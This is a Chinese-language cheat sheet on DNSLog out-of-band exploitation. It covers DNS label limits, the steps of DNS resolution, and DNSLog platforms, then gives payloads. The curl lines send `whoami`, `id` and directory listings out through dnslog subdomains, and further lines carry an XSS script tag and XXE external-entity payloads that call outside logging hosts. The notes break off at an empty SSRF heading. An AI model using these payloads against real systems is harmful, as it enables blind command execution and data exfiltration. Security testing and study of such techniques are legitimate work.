目录
DNSLog解决无回显
带外攻击(OOB=Out of Bind)
DNSLog利用限制
1.域名层级:一般不超过5级
2.每级域名最大长度:63个ASCII字符
3.总域名长度:253个ASCII字符
4.内容限制:数字、字母、下划线
5.适用漏洞:RCE、XXE、SSRF、SQL注入、JNDI注入、反序列化等
DNS解析流程
1.hosts文件(C:\Windows\System32\drivers\etc\hosts)
2.DNS缓存(ipconfig /displaydns)
3.本地DNS服务器(路由器自身,转发给上层)
4.根DNS服务器(Root Server),13组集群服务器
5.顶级域名DNS服务器(Top Level Domain Server),如.com、.cn、.org等
6.Name Server域名服务器的地址(域名服务商提供)
Windows环境变量大全
Linux下DNSLog利用
获取变量值:
curl http://`whoami`.xxxxxx.dnslog.cn/
base64编码输出:
curl http://$(id|base64).xxxxxx.dnslog.cn/
循环获取文件输出:
for i in (ls/);do curl "http://i.xxxxxx.dnslog.cn/";done;
dns平台
登录 - DNSlog System
登录
DNSLog Platform
CEYE - Monitor service for security testing
1.常用payloads
2.在线查询记录(HTTP/DNS),可下载
3.提供在线API,各种编程语言可调用
4.DNS Rebinding Server
DNS Rebinding Bypass SSRF-先知社区
XSS
<script src = haha.z6iktj.ceye.io></script>
dnslog反应
XXE
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://hahaha.skhn7t.dnslog.cn">%remote;]>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hahaha.z6iktj.ceye.io">
%remote;]>
<root/>
SSRF
